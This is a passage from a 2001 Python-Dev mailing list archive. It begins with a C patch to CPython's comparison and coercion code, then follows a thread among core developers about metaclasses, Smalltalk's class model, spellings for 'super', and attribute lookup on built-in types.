*/ + +static PyObject * +_PyNumber_OldstyleCompare(PyObject *v, + PyObject *w) +{ + int err; + + DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + err = PyNumber_CoerceEx(&v, &w); + if (err < 0) + return NULL; + else if (err == 0 && v->ob_type->tp_compare) { + int cmp; + + cmp = (*v->ob_type->tp_compare)(v, w); + /* XXX Test for errors ? Looks like C types cannot raise + exceptions in the compare slot... */ + Py_DECREF(v); + Py_DECREF(w); + DPRINTF(" compare slot returned: %i",cmp); + return PyInt_FromLong(cmp); + } + DPRINTF(" using type names for comparison\n"); + return PyInt_FromLong(strcmp(v->ob_type->tp_name, + w->ob_type->tp_name)); +} + +PyObject * +PyNumber_Compare(v, w) + PyObject *v, *w; +{ + DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + BINOP("__cmp__", "__rcmp__", PyNumber_Compare); + return _PyNumber_BinaryOperation(v,w, + NB_SLOT(nb_cmp), + "cmp()"); +} + [...] +static PyObject * +_PyNumber_BinaryOperation(PyObject *v, + PyObject *w, + const int op_slot, + const char *operation) +{ + PyNumberMethods *mv, *mw; + register PyObject *x; + register binaryfunc *slot; + int c; ... + /* When using old coercion, make sure that the requested slot + is available on old style numbers or use an emulation. */ + if (op_slot > NB_SLOT(nb_hex)) { + + /* Emulation hooks: */ + if (op_slot == NB_SLOT(nb_cmp)) + return _PyNumber_OldstyleCompare(v,w); + + goto badOperands; + } [...] int PyObject_Compare(v, w) PyObject *v, *w; { PyTypeObject *tp; @@ -291,27 +294,30 @@ PyObject_Compare(v, w) Py_DECREF(res); PyErr_SetString(PyExc_TypeError, "comparison did not return an int"); return -1; } - c = PyInt_AsLong(res); + c = PyInt_AS_LONG(res); Py_DECREF(res); return (c < 0) ? -1 : (c > 0) ? 
1 : 0; } if ((tp = v->ob_type) != w->ob_type) { - if (tp->tp_as_number != NULL && - w->ob_type->tp_as_number != NULL) { - int err; - err = PyNumber_CoerceEx(&v, &w); - if (err < 0) + if (tp->tp_as_number != NULL || + w->ob_type->tp_as_number != NULL) { + PyObject *res; + int c; + res = PyNumber_Compare(v,w); + if (res == NULL) return -1; - else if (err == 0) { - int cmp = (*v->ob_type->tp_compare)(v, w); - Py_DECREF(v); - Py_DECREF(w); - return cmp; + if (!PyInt_Check(res)) { + PyErr_SetString(PyExc_TypeError, + "comparison did not return an int"); + return -1; } + c = PyInt_AS_LONG(res); + Py_DECREF(res); + return (c < 0) ? -1 : (c > 0) ? 1 : 0; } return strcmp(tp->tp_name, w->ob_type->tp_name); } if (tp->tp_compare == NULL) return (v < w) ? -1 : 1; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 2 11:09:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 11:09:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <3AEFCEBD.2E5979C9@lemburg.com> Guido van Rossum wrote: > > While implementing more class-like behavior for built-in types in the > experimental descr-branch in the 2.2 CVS tree, I've noticed problems > caused by Python's collapsing of class attributes and instance > attributes. > > For example, suppose d is a dictionary. My experimental changes make > d.__class__ return DictType (from the types module). > (DictType.__class__ is TypeType, by the way.) I also added special > methods. For example, d.__repr__() now returns repr(d). I am > preparing for subclassing of built-in types, so I will eventually be > able to derive a class MyDictType from DictType, as follows: > > class MyDictType(DictType): > ... > > Now comes the fun part. 
Suppose MyDictType wants to define its own > repr(): > > class MyDictType(DictType): > def __repr__(self): > return "MyDictType(%s)" % DictType.__repr__(self) > > But, (surprise, surprise!), DictType itself also has a __repr__() > method: it returns the string "<type 'dictionary'>". > > So the above code would fail: DictType.__repr__() returns > repr(DictType), and DictType.__repr__(self) raises an argument count > error. The correct __repr__ method for dictionary objects can be > found as DictType.__dict__['__repr__'], but that looks hideous! > > What to do? Pragmatically, I can make DictType.__repr__ return > DictType.__dict__['__repr__'], and all will be well in this example. > But we have to tread carefully here: DictType.__class__ is TypeType, > but DictType.__dict__['__class__'] is a descriptor for the __class__ > attribute on dictionary objects. > > The best rule I can think of so far is that DictType.__dict__ gives > the *true* set of attribute descriptors for dictionary objects, and is > thus similar to Smalltalk's class.methodDict that Jim describes > below. DictType.foo is a shortcut that can resolve to either > DictType.__dict__['foo'] or to an attribute (maybe a method) of > DictType described in TypeType.__dict__['foo'], whichever is defined. > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. I'm not sure I can follow you here: DictType.__repr__ is the representation method of the dictionary and not inherited from TypeType, so there should be no problem. The problem with the misleading error message would only show up in case DictType does not define a __repr__ method. Then the inherited one from TypeType would come into play and cause the problem you mention above. Thinking in terms of meta-classes, I believe we should implement this mechanism in the meta-class (TypeType in this case).
Its __getattr__() will have to decide whether or not to expose its own methods and attributes. The only catch here is that currently instances and classes have control of whether and how to bind found functions as methods or not. We should probably change that to pass complete control over to the meta-class object and remove the special control flows currently found in instance_getattr2() and class_lookup(). In general, I think that meta-classes should not expose their attributes to the class objects they create, since this causes way too many problems. Perhaps I'm oversimplifying things here, but I have a feeling that we can go a long way by actually trying to see meta-classes as first-class members in the interpreter design and moving all the binding and lookup mechanisms over to this object type. The special casing should then take place in the meta-class rather than its creations. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 12:57:42 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 12:57:42 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> > > The most common use for these seems to be for calling > > inherited methods, so perhaps something like > > > > inherited MyBaseClass.foo(arg, ...) > > > > which would be equivalent to > > > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > > > where getmethod() is a new builtin like getattr() > > except that it looks in the __classdict__, and 'self' > > is really whatever the first argument of the containing > > method was. > > The second most common use is to reference class variables > (e.g.
imagine a class that keeps counters of how many instances have > been created and deleted in C.initcount and C.delcount). But these > should not have to change, since they really are class attributes. > > > Now that we have __future__, would such a change be contemplatable? > > Or is it too radical to even think about? > > If we can find a way to spell "super.method", we should be ready for > the future. I can't think of something right off the bat > unfortunately. Could we make super(self, MyBaseClass).foo(arg, ...) behave similarly to MyBaseClass.foo(self, arg, ...)? Wrapping this stuff in a function would probably also let us use the same pattern in existing Python versions. Thomas From thomas.heller at ion-tof.com Wed May 2 13:12:21 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 13:12:21 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> > Jim Althoff (a big commercial user of J[P]ython) sent me a summary of > how metaclasses work in Smalltalk. He should know, since he invented > them! :-) I include it below, with his permission. I found this very interesting reading. [From Jim Althoff] > In the list below, indentation indicates class hierarchy (superclass -- > subclass) The indentation, unfortunately, seems to be destroyed. > > plain-class > ---------------- > > o Class > o Object isInstanceOf > o ObjectMetaClass isInstanceOf MetaClass > o Class isInstanceOf > o ClassMetaClass isInstanceOf MetaClass > o MetaClass isInstanceOf > o MetaClassMetaClass isInstanceOf MetaClass > . . . > o Rectangle isInstanceOf > o RectangleMetaClass isInstanceOf MetaClass > o SpecializedRectangle isInstanceOf > o SpecializedRectangleMetaClass isInstanceOf MetaClass A question for Jim (this is more Smalltalk than Python related): How does the Behavior class fit into this picture?
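Thomas's suggestion that `super(self, MyBaseClass).foo(arg, ...)` behave like `MyBaseClass.foo(self, arg, ...)` can indeed be written as an ordinary helper with existing tools. A minimal sketch, assuming a hypothetical name `BaseProxy` (chosen so it does not clash with the later built-in `super(type, obj)`, which starts the search *after* `type` rather than at it) and the classic depth-first, left-to-right search of the bases:

```python
def _find(klass, name):
    """Classic depth-first, left-to-right search starting at `klass` itself."""
    if name in klass.__dict__:
        return klass.__dict__[name]
    for base in klass.__bases__:
        try:
            return _find(base, name)
        except AttributeError:
            continue
    raise AttributeError(name)


class BaseProxy:
    """Hypothetical helper: BaseProxy(self, MyBaseClass).foo(arg, ...)
    behaves like MyBaseClass.foo(self, arg, ...)."""

    def __init__(self, obj, klass):
        self._obj = obj
        self._klass = klass

    def __getattr__(self, name):
        attr = _find(self._klass, name)
        # Bind plain functions (and other descriptors) to the wrapped object.
        if hasattr(attr, "__get__"):
            return attr.__get__(self._obj, type(self._obj))
        return attr


class Base:
    def greet(self, who):
        return "Base greets %s" % who


class Derived(Base):
    def greet(self, who):
        # Extend the base-class method through the helper.
        return "Derived + " + BaseProxy(self, Base).greet(who)


print(Derived().greet("Guido"))  # Derived + Base greets Guido
```

The call site is no shorter than `Base.greet(self, who)`; the helper only pays off once the compiler can supply `self` and the class implicitly.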
Thomas From guido at digicool.com Wed May 2 14:15:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 07:15:57 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200." <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com> > > If we can find a way to spell "super.method", we should be ready for > > the future. I can't think of something right off the bat > > unfortunately. > > Could we make > > super(self, MyBaseClass).foo(arg, ...) > > behave similarly to > > MyBaseClass.foo(self, arg, ...)? > > Wrapping this stuff in a function would probably also > let us use the same pattern in existing Python versions. Yes, I can see how to write super() using current tools (or 1.5.2 even). The problem is that this makes super calls even more wordy than they already are! I can't think of anything that wouldn't require compiler support though. --Guido van Rossum (home page: http://www.python.org/~guido/) From gward at python.net Wed May 2 14:57:41 2001 From: gward at python.net (Greg Ward) Date: Wed, 2 May 2001 08:57:41 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500 References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> Message-ID: <20010502085741.B515@gerg.ca> On 02 May 2001, Guido van Rossum said: > Yes, I can see how to write super() using current tools (or 1.5.2 > even).
The problem is that this makes super calls even more wordy > than they already are! I can't think of anything that wouldn't > require compiler support though. I was just doing some gedanken with various ways to spell "super", and I think my favourite is the same as Java's (as I remember it): class MyClass (BaseClass): def foo (self, arg1, arg2): super.foo(arg1, arg2) Since I don't know much about Python's guts, I can't say how implementable this is, but I like the spelling. The semantics would be something like this (with adjustments to the reality of Python's guts): * 'super' is a magic object that only makes sense inside a 'def' inside a 'class' (at least for now; perhaps it could be generalized to work at class scope as well as method scope, but let's keep it simple) * super's notional __getattr__() does something like this: - peek at the calling stack frame and fetch the calling function (MyClass.foo) and the first argument to that function (self) - [is this possible?] ensure that calling_function is a bound method, and that it's bound to the self object we just plucked from the stack; raise a "misuse of super object" exception if not - walk the superclass tree starting at self.__class__.__bases__ (ie. skip self's class), looking for an object with the name passed to this __getattr__() call -- 'foo' - when found, return it - if not found, raise AttributeError The ability to peek at the calling stack frame is essential to this scheme, in order to fetch the "current object" (self) without needing to have it explicitly passed. Is this as bothersome from C as it is from Python? Greg -- Greg Ward - nerd gward at python.net http://starship.python.net/~gward/ In space, no one can hear you fart. From mal at lemburg.com Wed May 2 15:07:27 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Wed, 02 May 2001 15:07:27 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <3AF0068F.32388C87@lemburg.com> Greg Ward wrote: > > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > ... This doesn't work in Python since Python has multiple inheritance, e.g. super in class A(B,C): def foo(self): super.foo() is ambiguous. I'd rather suggest adding a function for finding the basemethod of a method. This is probably the most common task in this context.
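One possible reading of the suggested "basemethod" function is sketched below. The name `basemethod` and its signature are hypothetical. It searches the bases of the class that *defines* the calling method depth-first and left to right (first B and its ancestors, then C, for `class A(B, C)`), and it deliberately starts from that defining class rather than from `self.__class__`, the pitfall Thomas Heller raises about Greg Ward's scheme.

```python
_MISSING = object()  # sentinel, so attributes whose value is None are still found


def _search(klass, name):
    # Depth-first, left-to-right search of klass and its ancestors.
    if name in klass.__dict__:
        return klass.__dict__[name]
    for base in klass.__bases__:
        found = _search(base, name)
        if found is not _MISSING:
            return found
    return _MISSING


def basemethod(defining_class, name):
    """Hypothetical helper: the `name` attribute that `defining_class`
    inherits, skipping defining_class's own __dict__."""
    for base in defining_class.__bases__:
        found = _search(base, name)
        if found is not _MISSING:
            return found
    raise AttributeError("no base of %s defines %r"
                         % (defining_class.__name__, name))


class B:
    def foo(self):
        return "B.foo"


class C:
    def foo(self):
        return "C.foo"


class A(B, C):
    def foo(self):
        # Start at A's bases, not self.__class__.__bases__: for a D(A)
        # instance the latter would find A.foo again and recurse forever.
        return "A.foo -> " + basemethod(A, "foo")(self)


class D(A):
    pass


print(D().foo())  # A.foo -> B.foo
```

Present-day Python searches `type.__mro__` (the C3 linearization) instead, which can order shared ancestors, including `object`, differently from this depth-first walk.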
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 15:12:40 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 15:12:40 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook> [Greg Ward] > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) > > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] 
ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not > - walk the superclass tree starting at self.__class__.__bases__ Careful! The search in the above context must start at MyClass.__bases__, which may not be the same as self.__class__.__bases__. Thomas From guido at digicool.com Wed May 2 16:29:03 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:29:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400." <20010502085741.B515@gerg.ca> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> [Greg Ward, welcome back!] > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) I'm sure that's everybody's favorite way to spell it! It's mine too. :-) > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) Yes, that's about the only way it can be made to work. The compiler will have to (1) detect that 'super' is a free variable, and (2) make it a local and initialize it with the proper magic.
Or, to relieve the burden from the symbol table, we could make super a keyword, at the cost of breaking existing code. I don't think super is needed outside methods. > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not I don't think you can make that test, but making it a 'magic local' as I suggested above would avoid the problem. > - walk the superclass tree starting at self.__class__.__bases__ > (ie. skip self's class), looking for an object with the name > passed to this __getattr__() call -- 'foo' > - when found, return it > - if not found, raise AttributeError Yup, that's the easy part. :-) > The ability to peek at the calling stack frame is essential to this > scheme, in order to fetch the "current object" (self) without needing to > have it explicitly passed. Is this as bothersome from C as it is from > Python? No, in C it's easy. The problem is that there is no information in the frame that tells you where the currently executing function was defined -- all you have is the code object, which is context-independent. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 16:30:20 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:30:20 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200." 
<3AF0068F.32388C87@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com> > This doesn't work in Python since Python has multiple inheritance, > e.g. super in > > class A(B,C): > def foo(self): > super.foo() > > is ambiguous. I'm not sure what you mean. The search is totally well-defined: first search B for a foo method, then search C. > I'd rather suggest adding a function for finding the basemethod > of a method. This is probably the most common task in this context. I've never heard of the concept of basemethod, but if I may venture a guess, it would be the same definition as I give above. --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Wed May 2 15:38:42 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 2 May 2001 09:38:42 -0400 (EDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <15088.3554.953359.757584@slothrop.digicool.com> >>>>> "GvR" == Guido van Rossum writes: >> Since I don't know much about Python's guts, I can't say how >> implementable this is, but I like the spelling.
The semantics >> would be something like this (with adjustments to the reality of >> Python's guts): >> >> * 'super' is a magic object that only makes sense inside a 'def' >> inside a 'class' (at least for now; perhaps it could be >> generalized to work at class scope as well as method scope, but >> let's keep it simple) GvR> Yes, that's about the only way it can be made to work. The GvR> compiler will have to (1) detect that 'super' is a free GvR> variable, and (2) make it a local and initialize it with the GvR> proper magic. Or, to relieve the burden from the symbol table, GvR> we could make super a keyword, at the cost of breaking existing GvR> code. GvR> I don't think super is needed outside methods. It seems helpful to clarify here, since this came up in conversation at PythonLabs just the other day with the yield statement. If we try to avoid keywords, we have to take the "well, I don't see anyone assigning to this name" route. If the compiler does not detect any assignment to a nearly reserved word, like super, it would give the use of that word special meaning. There are a bunch of little problems. A module could (not necessarily should) be designed to have a global name poked into its namespace; this would break, because the name would already have transmogrified from a regular variable into a special one. The use of exec or import star would make it impossible for the word to take on its special meaning. So keywords really are a lot clearer, but they have the potential to be incompatible. 
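The "no one assigns to this name" route amounts to a symbol-table check. A rough sketch using the standard `symtable` module, which exposes the scope analysis of today's CPython compiler rather than the 2001 one; `scopes_binding` is a hypothetical helper. Being purely static, it cannot see a name poked into a module's namespace from outside at run time, which is exactly the fragility described above.

```python
import symtable


def scopes_binding(source, name):
    """Names of function scopes in `source` that assign to `name`,
    according to the compiler's symbol table (no code is executed)."""
    top = symtable.symtable(source, "<example>", "exec")
    found = []

    def walk(table):
        if isinstance(table, symtable.Function) and name in table.get_identifiers():
            if table.lookup(name).is_assigned():
                found.append(table.get_name())
        for child in table.get_children():
            walk(child)

    walk(top)
    return found


code = '''
class MyClass(BaseClass):
    def foo(self, arg1, arg2):
        super.foo(arg1, arg2)   # only read: could get the special meaning

    def bar(self):
        super = None            # assigned: must stay an ordinary local
        return super
'''

print(scopes_binding(code, "super"))  # ['bar']
```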
Jeremy From fredrik at pythonware.com Wed May 2 16:00:55 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 2 May 2001 16:00:55 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff> guido wrote: > > class MyClass (BaseClass): > > def foo (self, arg1, arg2): > > super.foo(arg1, arg2) > > I'm sure that's everybody's favorite way to spell it! not mine. my brain contains far too much Python 1.5.2 code for it to accept that some variables are dynamically scoped, while others are lexically scoped. why not spell it out: self.__super__.foo(arg1, arg2) or self.super.foo(arg1, arg2) or super(self).foo(arg1, arg2) > Or, to relieve the burden from the symbol table, we could make super > a keyword, at the cost of breaking existing code. hey, how about introducing $ as a keyword prefix for newly introduced keywords? $super.foo(arg1, arg2) (this can of course be mapped to either of my previous suggestions; "$foo" either means "self.foo" or "foo(self)"...) and to save a little typing, only use it for keywords that start with an "s" (should leave us plenty of expansion room): $uper.foo(arg1, arg2) otoh, if "super" is common enough to motivate introducing magic objects into python, maybe "$" should mean "super."? $foo(arg1, arg2) and while we're at it, let's introduce "@" for "self.". gotta run -- time for my monthly reboot /F From guido at digicool.com Wed May 2 17:03:37 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:03:37 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200." 
<3AEFCEBD.2E5979C9@lemburg.com> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com> [me] > > The best rule I can think of so far is that DictType.__dict__ gives > > the *true* set of attribute descriptors for dictionary objects, and is > > thus similar to Smalltalk's class.methodDict that Jim describes > > below. DictType.foo is a shortcut that can resolve to either > > DictType.__dict__['foo'] or to an attribute (maybe a method) of > > DictType described in TypeType.__dict__['foo'], whichever is defined. > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. [MAL] > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that both a dictionary object (call it d) and its type (DictType) have a __repr__ method: repr(d) returns "d", and repr(DictType) returns "<type 'dictionary'>".
Given the analogy with classes, where str(x) invokes x.__str__() and x.__str__() can also be called directly, it is not unreasonable to expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent to x.__class__.foo(x), the two forms above should also be equivalent to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very pragmatic point that once I allow subclassing from DictType, such a subclass might very well want to override __repr__ to wrap the base class __repr__, and the conventional way to reference that (barring the implementation of 'super') is DictType.__repr__. Direct invocation of an object's own __repr__ method as x.__repr__() is much less common. The implementation of repr(x) can do the right thing, which is to look for x.__class__.__dict__['__repr__'].

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance yet. DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes or not.

That's exactly how I solved it: type_getattro() implements the rule quoted at the top.
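For readers following along in modern Python: Python 3 applies the rule Guido describes to implicit calls. repr(x) looks __repr__ up on type(x), walking its MRO, and passes x explicitly, so repr(d) and repr(DictType) never compete for the same method. The sketch below mimics that lookup. It is Python 3, not the 2001 interpreter under discussion, and lookup_special, my_repr and Point are hypothetical names.

```python
def lookup_special(obj, name):
    """Find `name` on type(obj), walking its MRO; never consult obj itself."""
    for klass in type(obj).__mro__:
        if name in klass.__dict__:
            return klass.__dict__[name]
    raise AttributeError(name)


def my_repr(obj):
    # Fetch the raw function (or C slot wrapper) from the class dict and
    # pass obj explicitly, mirroring x.__class__.__dict__['__repr__'](x).
    return lookup_special(obj, "__repr__")(obj)


class Point:
    def __repr__(self):
        return "Point()"


p = Point()
print(my_repr(p))       # Point()  (found in Point.__dict__)
print(my_repr(Point))   # found in type.__dict__, not Point.__dict__
```

Note that calling Point.__repr__() directly fails for lack of an instance; that is exactly the ambiguity the type-based rule avoids.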
> The only catch here is that currently instances and classes have > control of whether and how to bind found functions as methods or not. > We should probably change that to pass complete control over to the > meta-class object and remove the special control flows currently found > in instance_getattr2() and class_lookup(). Um, yeah, that's where I think this will end up causing more trouble. Right now, if x is an instance, some attributes like x.__class__ and x.__dict__ are special-cased in instance_getattr(). The mechanism I propose removes the need for (most of) such special cases, and instead allows the class to provide "descriptors" for instance attributes. So, for example, if instances of a class C have an attribute named foo, C.__dict__['foo'] contains the descriptor for that attribute, and that is how the implementation decides how to interpret x.foo (assuming x is an instance of C). We may be able to access this same descriptor as C.foo, but that's really only important for backwards compatibility with the way classes work today. > In general, I think that meta-classes should not expose their > attributes to the class objects they create, since this causes > way too many problems. I agree. > Perhaps I'm oversimplifying things here, but I have a feeling that > we can go a long way by actually trying to see meta-classes as > first class members in the interpreter design and moving all the > binding and lookup mechanisms over to this object type. The special > casing should then take place in the meta-class rather than its > creations. Yes, that's where I'm heading! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:02:41 2001 From: mal at lemburg.com (M.-A.
Lemburg) Date: Wed, 02 May 2001 16:02:41 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF01381.592AE31B@lemburg.com> Guido van Rossum wrote: > > > This doesn't work in Python since Python has multiple inheritance, > > e.g. super in > > > > class A(B,C): > > def foo(self): > > super.foo() > > > > is ambiguous. > > I'm not sure what you mean. The search is totally well-defined: first > search B for a foo method, then search C. I thought you were talking about an abstract super class which is how Java uses this term. Rereading some of the posts, I think you are indeed referring to the method which foo overrides -- this is what I call basemethod (since it is implemented in one of the base classes). > > I'd rather suggest adding a function for finding the basemethod > > of a method. This is probably the most common task in this context. > > I've never heard of the concept of basemethod, but if I may venture a > guess, it would be the same definition as I give above. The basemethod can be defined as the first method of the same name found in the inheritance tree using the standard Python lookup strategy (left-right, depth first) when continuing the lookup search at the node in the inheritance tree which defines the method querying the basemethod. In other words: you let Python continue the search for the method as if it hadn't found the occurrence calling the basemethod() API. Hmm, still not clear enough... better let Tim jump in 